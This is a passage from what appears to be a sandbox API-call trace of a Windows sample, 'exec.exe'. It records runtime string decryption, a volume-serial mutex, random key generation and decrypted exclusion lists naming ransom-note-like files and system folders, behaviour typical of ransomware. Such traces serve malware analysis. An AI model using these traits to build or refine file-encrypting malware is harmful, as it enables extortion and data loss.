Ptr=0x8cb780, Size=0xb46) returned 0x8cb780 [0065.092] GetLastError () returned 0x0 [0065.092] RtlReAllocateHeap (Heap=0x8c0000, Flags=0x0, Ptr=0x8c9798, Size=0x98) returned 0x8c59b8 [0065.092] GetLastError () returned 0x0 [0065.092] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x1afb54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x1afbbc | out: phKey=0x1afbbc*=0x2ebcf0) returned 1 [0065.092] CryptSetKeyParam (hKey=0x2ebcf0, dwParam=0x1, pbData=0x1afba4, dwFlags=0x0) returned 1 [0065.092] CryptDecrypt (in: hKey=0x2ebcf0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c1470, pdwDataLen=0x1afb70 | out: pbData=0x8c1470, pdwDataLen=0x1afb70) returned 1 [0065.092] CryptDestroyKey (hKey=0x2ebcf0) returned 1 [0065.092] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x1e) returned 0x8c1498 [0065.092] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x1e) returned 0x8c5480 [0065.092] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x90) returned 0x8c54a8 [0065.092] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x1afb2c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x1afb94 | out: phKey=0x1afb94*=0x2ebcf0) returned 1 [0065.092] CryptSetKeyParam (hKey=0x2ebcf0, dwParam=0x1, pbData=0x1afb7c, dwFlags=0x0) returned 1 [0065.092] CryptDecrypt (in: hKey=0x2ebcf0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c54a8, pdwDataLen=0x1afb48 | out: pbData=0x8c54a8, pdwDataLen=0x1afb48) returned 1 [0065.092] CryptDestroyKey (hKey=0x2ebcf0) returned 1 [0065.092] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c54a8 | out: hHeap=0x8c0000) returned 1 [0065.092] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x8c1498, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0065.092] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c5480 | out: hHeap=0x8c0000) returned 1 [0065.092] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1470 | out: hHeap=0x8c0000) returned 1 [0065.092] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x1afbfc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1afbfc*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0065.093] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1498 | out: hHeap=0x8c0000) returned 1 [0065.093] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x28) returned 0x8c1470 [0065.093] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x10) returned 0xd36bc0 [0065.093] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x1afa64, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x1afacc | out: phKey=0x1afacc*=0x2ebcf0) returned 1 [0065.093] CryptSetKeyParam (hKey=0x2ebcf0, dwParam=0x1, pbData=0x1afab4, dwFlags=0x0) returned 1 [0065.093] CryptDecrypt (in: hKey=0x2ebcf0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xd36bc0, pdwDataLen=0x1afa80 | out: pbData=0xd36bc0, pdwDataLen=0x1afa80) returned 1 [0065.093] CryptDestroyKey (hKey=0x2ebcf0) returned 1 [0065.093] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x10) returned 0xd36bd8 [0065.093] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x1afa5c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x1afac4 | out: phKey=0x1afac4*=0x2ebcf0) returned 1 [0065.093] CryptSetKeyParam (hKey=0x2ebcf0, dwParam=0x1, pbData=0x1afaac, dwFlags=0x0) returned 1 [0065.093] CryptDecrypt (in: hKey=0x2ebcf0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xd36bd8, pdwDataLen=0x1afa78 | out: pbData=0xd36bd8, pdwDataLen=0x1afa78) returned 1 [0065.093] CryptDestroyKey (hKey=0x2ebcf0) returned 1 [0065.093] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x10) returned 0xd36bf0 [0065.093] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x1afa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x1afabc | out: phKey=0x1afabc*=0x2ebcf0) returned 1 [0065.093] CryptSetKeyParam (hKey=0x2ebcf0, dwParam=0x1, pbData=0x1afaa4, dwFlags=0x0) returned 1 [0065.093] CryptDecrypt (in: hKey=0x2ebcf0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xd36bf0, pdwDataLen=0x1afa70 | out: pbData=0xd36bf0, pdwDataLen=0x1afa70) returned 1 [0065.093] CryptDestroyKey (hKey=0x2ebcf0) returned 1 [0065.093] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x10) returned 0xd36c08 [0065.093] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x1afa4c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x1afab4 | out: phKey=0x1afab4*=0x2ebcf0) returned 1 [0065.093] CryptSetKeyParam (hKey=0x2ebcf0, dwParam=0x1, pbData=0x1afa9c, dwFlags=0x0) returned 1 [0065.093] CryptDecrypt (in: hKey=0x2ebcf0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xd36c08, pdwDataLen=0x1afa68 | out: pbData=0xd36c08, pdwDataLen=0x1afa68) returned 1 [0065.094] CryptDestroyKey (hKey=0x2ebcf0) returned 1 [0065.094] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x90) returned 0x8c5480 [0065.094] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x1afa44, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x1afaac | out: phKey=0x1afaac*=0x2ebcf0) returned 1 [0065.094] CryptSetKeyParam (hKey=0x2ebcf0, dwParam=0x1, pbData=0x1afa94, dwFlags=0x0) returned 1 [0065.094] CryptDecrypt (in: hKey=0x2ebcf0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c5480, pdwDataLen=0x1afa60 | out: pbData=0x8c5480, pdwDataLen=0x1afa60) returned 1 [0065.094] CryptDestroyKey (hKey=0x2ebcf0) returned 1 [0065.094] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x10) returned 0xd36c20 [0065.094] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x1afa3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x1afaa4 | out: phKey=0x1afaa4*=0x2ebcf0) returned 1 [0065.094] CryptSetKeyParam (hKey=0x2ebcf0, dwParam=0x1, pbData=0x1afa8c, dwFlags=0x0) returned 1 [0065.094] CryptDecrypt (in: hKey=0x2ebcf0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xd36c20, pdwDataLen=0x1afa58 | out: pbData=0xd36c20, pdwDataLen=0x1afa58) returned 1 [0065.094] CryptDestroyKey (hKey=0x2ebcf0) returned 1 [0065.094] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x70) returned 0x8c5518 [0065.094] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x1afa34, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x1afa9c | out: phKey=0x1afa9c*=0x2ebcf0) returned 1 [0065.094] CryptSetKeyParam (hKey=0x2ebcf0, dwParam=0x1, pbData=0x1afa84, dwFlags=0x0) returned 1 [0065.094] CryptDecrypt (in: hKey=0x2ebcf0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c5518, pdwDataLen=0x1afa50 | out: pbData=0x8c5518, pdwDataLen=0x1afa50) returned 1 [0065.094] CryptDestroyKey (hKey=0x2ebcf0) returned 1 [0065.094] htonl (hostlong=0x9c354b42) returned 0x424b359c [0065.094] CryptGenRandom (in: hProv=0x2e4fe0, dwLen=0x20, pbBuffer=0x1afb90 | out: pbBuffer=0x1afb90) returned 1 [0065.094] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x28) returned 0x8c14a0 [0065.094] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x10) returned 0xd36c38 [0065.094] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x4) returned 0x8c1748 [0065.094] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x14) returned 0x8c5710 [0065.094] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x10) returned 0xd36c50 [0065.094] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x80) returned 0x8c5730 [0065.094] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x10) returned 0xd36c68 [0065.094] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x82) returned 0x8c9798 [0065.094] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x10) returned 0xd36c80 [0065.094] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x4) returned 0xd373a8 [0065.094] CryptGenRandom (in: hProv=0x2e8438, dwLen=0x55, pbBuffer=0x1afafa | out: pbBuffer=0x1afafa) returned 1 [0065.094] GetLastError () returned 0x0 [0065.094] RtlReAllocateHeap (Heap=0x8c0000, Flags=0x0, Ptr=0xd373b8, Size=0x82) returned 0x8c9828 [0065.095] RtlReAllocateHeap (Heap=0x8c0000, Flags=0x0, Ptr=0xd373d8, Size=0x100) returned 0xd37790 [0065.095] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x10) returned 0xd36cf8 [0065.095] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x82) returned 0x8c98b8 [0065.095] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x10) returned 0xd36d10 [0065.095] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x82) returned 0x8c9948 [0065.095] RtlReAllocateHeap (Heap=0x8c0000, Flags=0x0, Ptr=0x8c98b8, Size=0x104) returned 0xd37898 [0065.095] RtlReAllocateHeap (Heap=0x8c0000, Flags=0x0, Ptr=0x8c5730, Size=0x100) returned 0xd379a8 [0065.095] RtlReAllocateHeap (Heap=0x8c0000, Flags=0x0, Ptr=0x8c9828, Size=0x104) returned 0xd37ab0 [0065.095] RtlReAllocateHeap (Heap=0x8c0000, Flags=0x0, Ptr=0xd37790, Size=0x200) returned 0xd37bc0 [0065.095] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd373c8 | out: hHeap=0x8c0000) returned 1 [0065.095] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd37bc0 | out: hHeap=0x8c0000) returned 1 [0065.095] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd36ce0 | out: hHeap=0x8c0000) returned 1 [0065.096] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c57b8 | out: hHeap=0x8c0000) returned 1 [0065.096] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd36c98 | out: hHeap=0x8c0000) returned 1 [0065.096] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c5840 | out: hHeap=0x8c0000) returned 1 [0065.096] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd36cc8 | out: hHeap=0x8c0000) returned 1 [0065.096] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd37ab0 | out: hHeap=0x8c0000) returned 1 [0065.096] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd36cb0 | out: hHeap=0x8c0000) returned 1 [0065.096] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd37898 | out: hHeap=0x8c0000) returned 1 [0065.096] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd36cf8 | out: hHeap=0x8c0000) returned 1 [0065.096] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c9948 | out: hHeap=0x8c0000) returned 1 [0065.096] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd36d10 | out: hHeap=0x8c0000) returned 1 [0065.096] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1748 | out: hHeap=0x8c0000) returned 1 [0065.096] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd36c38 | out: hHeap=0x8c0000) returned 1 [0065.096] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c9798 | out: hHeap=0x8c0000) returned 1 [0065.096] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd36c68 | out: hHeap=0x8c0000) returned 1 [0065.096] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd379a8 | out: hHeap=0x8c0000) returned 1 [0065.096] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd36c50 | out: hHeap=0x8c0000) returned 1 [0065.096] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd373a8 | out: hHeap=0x8c0000) returned 1 [0065.096] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd36c80 | out: hHeap=0x8c0000) returned 1 [0065.096] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c14a0 | out: hHeap=0x8c0000) returned 1 [0065.096] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c5710 | out: hHeap=0x8c0000) returned 1 [0065.096] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0xa4) returned 0x8c5710 [0065.096] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x62) returned 0x8c57c0 [0065.096] RtlReAllocateHeap (Heap=0x8c0000, Flags=0x0, Ptr=0x8c57c0, Size=0xc2) returned 0x8c57c0 [0065.096] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x10) returned 0xd36c80 [0065.096] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0xb40) returned 0x8cc2d0 [0065.096] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x1afa2c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x1afa94 | out: phKey=0x1afa94*=0x2ebcf0) returned 1 [0065.096] CryptSetKeyParam (hKey=0x2ebcf0, dwParam=0x1, pbData=0x1afa7c, dwFlags=0x0) returned 1 [0065.096] CryptDecrypt (in: hKey=0x2ebcf0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8cc2d0, pdwDataLen=0x1afa48 | out: pbData=0x8cc2d0, pdwDataLen=0x1afa48) returned 1 [0065.096] CryptDestroyKey (hKey=0x2ebcf0) returned 1 [0065.096] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x10) returned 0xd36c50 [0065.096] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x1afa24, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x1afa8c | out: phKey=0x1afa8c*=0x2ebcf0) returned 1 [0065.097] CryptSetKeyParam (hKey=0x2ebcf0, dwParam=0x1, pbData=0x1afa74, dwFlags=0x0) returned 1 [0065.097] CryptDecrypt (in: hKey=0x2ebcf0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xd36c50, pdwDataLen=0x1afa40 | out: pbData=0xd36c50, pdwDataLen=0x1afa40) returned 1 [0065.097] CryptDestroyKey (hKey=0x2ebcf0) returned 1 [0065.097] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x90) returned 0x8c5890 [0065.097] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x1af9fc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x1afa64 | out: phKey=0x1afa64*=0x2ebcf0) returned 1 [0065.097] CryptSetKeyParam (hKey=0x2ebcf0, dwParam=0x1, pbData=0x1afa4c, dwFlags=0x0) returned 1 [0065.097] CryptDecrypt (in: hKey=0x2ebcf0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c5890, pdwDataLen=0x1afa18 | out: pbData=0x8c5890, pdwDataLen=0x1afa18) returned 1 [0065.097] CryptDestroyKey (hKey=0x2ebcf0) returned 1 [0065.097] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x84) returned 0x8c9798 [0065.097] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x84) returned 0x8c9948 [0065.097] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x90) returned 0xd37790 [0065.097] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x1af9d4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x1afa3c | out: phKey=0x1afa3c*=0x2ebcf0) returned 1 [0065.097] CryptSetKeyParam (hKey=0x2ebcf0, dwParam=0x1, pbData=0x1afa24, dwFlags=0x0) returned 1 [0065.097] CryptDecrypt (in: hKey=0x2ebcf0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xd37790, pdwDataLen=0x1af9f0 | out: pbData=0xd37790, pdwDataLen=0x1af9f0) returned 1 [0065.097] CryptDestroyKey (hKey=0x2ebcf0) returned 1 [0065.097] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd37790 | out: hHeap=0x8c0000) returned 1 [0065.097] ExpandEnvironmentStringsW (in: lpSrc="info.hta;info.txt;boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys", lpDst=0x8c9798, nSize=0x42 | out: lpDst="info.hta;info.txt;boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys") returned 0x42 [0065.097] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c9948 | out: hHeap=0x8c0000) returned 1 [0065.097] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c5890 | out: hHeap=0x8c0000) returned 1 [0065.097] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x60) returned 0x8c5890 [0065.097] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x1af9f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x1afa60 | out: phKey=0x1afa60*=0x2ebcf0) returned 1 [0065.097] CryptSetKeyParam (hKey=0x2ebcf0, dwParam=0x1, pbData=0x1afa48, dwFlags=0x0) returned 1 [0065.097] CryptDecrypt (in: hKey=0x2ebcf0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c5890, pdwDataLen=0x1afa14 | out: pbData=0x8c5890, pdwDataLen=0x1afa14) returned 1 [0065.097] CryptDestroyKey (hKey=0x2ebcf0) returned 1 [0065.097] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x5c) returned 0x8c58f8 [0065.097] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x5c) returned 0xd37790 [0065.097] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x90) returned 0xd377f8 [0065.097] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x1af9d0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x1afa38 | out: phKey=0x1afa38*=0x2ebcf0) returned 1 [0065.097] CryptSetKeyParam (hKey=0x2ebcf0, dwParam=0x1, pbData=0x1afa20, dwFlags=0x0) returned 1 [0065.097] CryptDecrypt (in: hKey=0x2ebcf0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xd377f8, pdwDataLen=0x1af9ec | out: pbData=0xd377f8, pdwDataLen=0x1af9ec) returned 1 [0065.097] CryptDestroyKey (hKey=0x2ebcf0) returned 1 [0065.098] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd377f8 | out: hHeap=0x8c0000) returned 1 [0065.098] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows;Program Files;Program Files (x86);", lpDst=0x8c58f8, nSize=0x2e | out: lpDst="C:\\Windows;Program Files;Program Files (x86);") returned 0x2e [0065.098] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd37790 | out: hHeap=0x8c0000) returned 1 [0065.098] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c5890 | out: hHeap=0x8c0000) returned 1 [0065.098] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x20a) returned 0xd37790 [0065.098] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x20a) returned 0xd379a8 [0065.098] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xd379a8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\exec.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\exec.exe")) returned 0x2e [0065.098] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd379a8 | out: hHeap=0x8c0000) returned 1 [0065.098] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0xb38) returned 0x8cce18 [0065.098] GetLastError () returned 0x0 [0065.098] RtlReAllocateHeap (Heap=0x8c0000, Flags=0x0, Ptr=0x8c9948, Size=0x98) returned 0xd379a8 [0065.098] GetLastError () returned 0x0 [0065.098] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1241edc, lpParameter=0x1afc30, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xb8 [0065.099] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1241958, lpParameter=0x1afc30, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x118 [0065.100] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1241a4b, lpParameter=0x1afc30, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x114 [0065.101] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0xffffffff) Thread: id = 2 os_tid = 0x97c [0038.620] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x20) returned 0x8c1470 [0038.620] CryptImportKey (in: hProv=0x2e4fe0, pbData=0xaafd68, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaafdd0 | out: phKey=0xaafdd0*=0x2e4ba8) returned 1 [0038.620] CryptSetKeyParam (hKey=0x2e4ba8, dwParam=0x1, pbData=0xaafdb8, dwFlags=0x0) returned 1 [0038.620] CryptDecrypt (in: hKey=0x2e4ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c1470, pdwDataLen=0xaafd84 | out: pbData=0x8c1470, pdwDataLen=0xaafd84) returned 1 [0038.620] CryptDestroyKey (hKey=0x2e4ba8) returned 1 [0038.620] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x1e) returned 0x8c1498 [0038.620] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x1e) returned 0x8c14c0 [0038.620] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x90) returned 0x8c14e8 [0038.620] CryptImportKey (in: hProv=0x2e4fe0, pbData=0xaafd40, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaafda8 | out: phKey=0xaafda8*=0x2e4ba8) returned 1 [0038.620] CryptSetKeyParam (hKey=0x2e4ba8, dwParam=0x1, pbData=0xaafd90, dwFlags=0x0) returned 1 [0038.620] CryptDecrypt (in: hKey=0x2e4ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c14e8, pdwDataLen=0xaafd5c | out: pbData=0x8c14e8, pdwDataLen=0xaafd5c) returned 1 [0038.620] CryptDestroyKey (hKey=0x2e4ba8) returned 1 [0038.620] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c14e8 | out: hHeap=0x8c0000) returned 1 [0038.621] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x8c1498, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0038.621] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c14c0 | out: hHeap=0x8c0000) returned 1 [0038.621] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1470 | out: hHeap=0x8c0000) returned 1 [0038.621] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0xaafe10, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0xaafe10*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0038.621] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1498 | out: hHeap=0x8c0000) returned 1 [0038.621] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x40) returned 0x8c1470 [0038.621] CryptImportKey (in: hProv=0x2e4fe0, pbData=0xaafd9c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaafe04 | out: phKey=0xaafe04*=0x2e4ba8) returned 1 [0038.621] CryptSetKeyParam (hKey=0x2e4ba8, dwParam=0x1, pbData=0xaafdec, dwFlags=0x0) returned 1 [0038.621] CryptDecrypt (in: hKey=0x2e4ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c1470, pdwDataLen=0xaafdb8 | out: pbData=0x8c1470, pdwDataLen=0xaafdb8) returned 1 [0038.621] CryptDestroyKey (hKey=0x2e4ba8) returned 1 [0038.621] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x34) returned 0x8c14b8 [0038.621] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x0 [0038.621] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\00019C354B4200") returned 0x90 [0038.621] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x0 [0038.621] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1470 | out: hHeap=0x8c0000) returned 1 [0038.621] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c14b8 | out: hHeap=0x8c0000) returned 1 [0038.621] ReleaseMutex (hMutex=0x90) returned 1 [0038.621] CloseHandle (hObject=0x90) returned 1 [0038.622] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1241f44, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x90 [0038.622] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x20) returned 0x8c1470 [0038.622] CryptImportKey (in: hProv=0x2e4fe0, pbData=0xaafd68, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaafdd0 | out: phKey=0xaafdd0*=0x2e4ba8) returned 1 [0038.622] CryptSetKeyParam (hKey=0x2e4ba8, dwParam=0x1, pbData=0xaafdb8, dwFlags=0x0) returned 1 [0038.622] CryptDecrypt (in: hKey=0x2e4ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c1470, pdwDataLen=0xaafd84 | out: pbData=0x8c1470, pdwDataLen=0xaafd84) returned 1 [0038.622] CryptDestroyKey (hKey=0x2e4ba8) returned 1 [0038.622] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x1e) returned 0x8c1498 [0038.622] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x1e) returned 0x8c14c0 [0038.622] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x90) returned 0x8c14e8 [0038.622] CryptImportKey (in: hProv=0x2e4fe0, pbData=0xaafd40, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaafda8 | out: phKey=0xaafda8*=0x2e4ba8) returned 1 [0038.622] CryptSetKeyParam (hKey=0x2e4ba8, dwParam=0x1, pbData=0xaafd90, dwFlags=0x0) returned 1 [0038.622] CryptDecrypt (in: hKey=0x2e4ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c14e8, pdwDataLen=0xaafd5c | out: pbData=0x8c14e8, pdwDataLen=0xaafd5c) returned 1 [0038.623] CryptDestroyKey (hKey=0x2e4ba8) returned 1 [0038.623] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c14e8 | out: hHeap=0x8c0000) returned 1 [0038.623] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x8c1498, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0038.623] HeapFree (in: 